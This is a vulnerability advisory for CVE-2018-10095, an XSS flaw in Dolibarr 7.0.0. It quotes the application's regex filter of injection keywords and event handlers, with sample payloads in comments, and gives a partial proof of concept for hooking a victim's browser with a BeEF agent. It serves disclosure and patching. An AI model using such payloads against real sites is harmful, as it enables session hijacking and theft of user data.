Dolibarr 7.0.0 Cross Site Scripting

Dolibarr version 7.0.0 suffers from a cross site scripting vulnerability.

MD5 | f1bd233c0fbb694e7d33c866d8b44e05

# [CVE-2018-10095] Dolibarr XSS Injection vulnerability

## Description

Dolibarr is an "Open Source ERP & CRM for Business" used by many
companies worldwide.

It is available through [GitHub](
or as distribution packages (e.g .deb package).


The application does not handle user input properly, allowing
client-side JavaScript code injection (XSS).


User input should be filtered to avoid arbitrary HTML injection.

## Vulnerability type

**CVE ID**: CVE-2018-10095

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-79

**CVSS Base Score**: 7.4

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

## Details

Checks are enforced on user input via the `test_sql_and_script_inject()`
function, which forbids some SQL keywords (e.g `union`, `create`,
`insert`) and some XSS-related strings (`onfocus`, for instance).


* Security: SQL Injection and XSS Injection (scripts) protection
(Filters on GET, POST, PHP_SELF).
* @param string $val Value
* @param string $type 1=GET, 0=POST, 2=PHP_SELF
* @return int >0 if there is an injection
function test_sql_and_script_inject($val, $type)
$inj = 0;
// For SQL Injection (only GET are used to be included into bad
escaped SQL requests)
if ($type == 1)
$inj += preg_match('/updatexml\(/i', $val);
$inj += preg_match('/delete\s+from/i', $val);
$inj += preg_match('/create\s+table/i', $val);
$inj += preg_match('/insert\s+into/i', $val);
$inj += preg_match('/select\s+from/i', $val);
$inj += preg_match('/into\s+(outfile|dumpfile)/i', $val);
if ($type != 2) // Not common, we can check on POST
$inj += preg_match('/update.+set.+=/i', $val);
$inj += preg_match('/union.+select/i', $val);
$inj += preg_match('/(\.\.%2f)+/i', $val);
// For XSS Injection done by adding javascript with script
// This is all cases a browser consider text is javascript:
// When it found '<script', 'javascript:', '<style', 'onload\s=' on
body tag, '="&' on a tag size with old browsers
// All examples on page:
// More on
$inj += preg_match('/<script/i', $val);
$inj += preg_match('/<iframe/i', $val);
$inj += preg_match('/Set\.constructor/i', $val); // ECMA script 6
if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
$inj += preg_match('/base[\s]+href/si', $val);
$inj += preg_match('/<.*onmouse/si', $val); // onmousexxx can
be set on img or any html tag like <img title='...' onmouseover=alert(1)>
$inj += preg_match('/onerror\s*=/i', $val); // onerror can be
set on img or any html tag like <img title='...' onerror = alert(1)>
$inj += preg_match('/onfocus\s*=/i', $val); // onfocus can be
set on input text html tag like <input type='text' value='...' onfocus =
$inj += preg_match('/onload\s*=/i', $val); // onload can be
set on svg tag <svg/onload=alert(1)> or other tag like body <body
$inj += preg_match('/onclick\s*=/i', $val); // onclick can be
set on img text html tag like <img onclick = alert(1)>
$inj += preg_match('/onscroll\s*=/i', $val); // onscroll can be
on textarea
//$inj += preg_match('/on[A-Z][a-z]+\*=/', $val); // To lock event
handlers onAbort(), ...
$inj += preg_match('/:|&#0000058|&#x3A/i', $val); //
refused string ':' encoded (no reason to have it encoded) to lock
//if ($type == 1)
$inj += preg_match('/javascript:/i', $val);
$inj += preg_match('/vbscript:/i', $val);
// For XSS Injection done by adding javascript closing html tags
like with onmousemove, etc... (closing a src or href tag with not
cleaned param)
if ($type == 1) $inj += preg_match('/"/i', $val); // We
refused " in GET parameters value
if ($type == 2) $inj += preg_match('/[;"]/', $val); // PHP_SELF
is a file system path. It can contains spaces.
return $inj;

## Proof of Concept : injecting a Beef agent into the victim's browser

**Exploit link**


**HTTP Request**

Host: dolibarr.lab:2080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
x64; Trident/5.0)
Connection: close
Referer: http://dolibarr.lab:2080/dolibarr/adherents/cartes/carte.php


t><br>Login: <input size="10" type="text" name="foruserlogin"
class="button" type="submit" value="Build Doc"></form><br><img src="/dolibar

## Affected versions

* Version 7.0.0 (last stable version as of March 2018) - previous
versions are probably also vulnerable but not tested

## Solution

Update to 7.0.2

## Timeline (dd/mm/yyyy)

* 18/03/2018 : Initial discovery
* 17/04/2018 : Contact with the editor
* 17/04/2018 : Editor acknowledges the vulnerability
* 18/04/2018 : Editor announces fixes in version 7.0.2
* 21/05/2018 : Vulnerability disclosure

## Credits

* Issam RABHI (i dot rabhi at
* Kevin LOCATI (k dot locati at sysdream dot com)

SYSDREAM Labs <[email protected]>

47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website:
* Twitter: @sysdream

Related Posts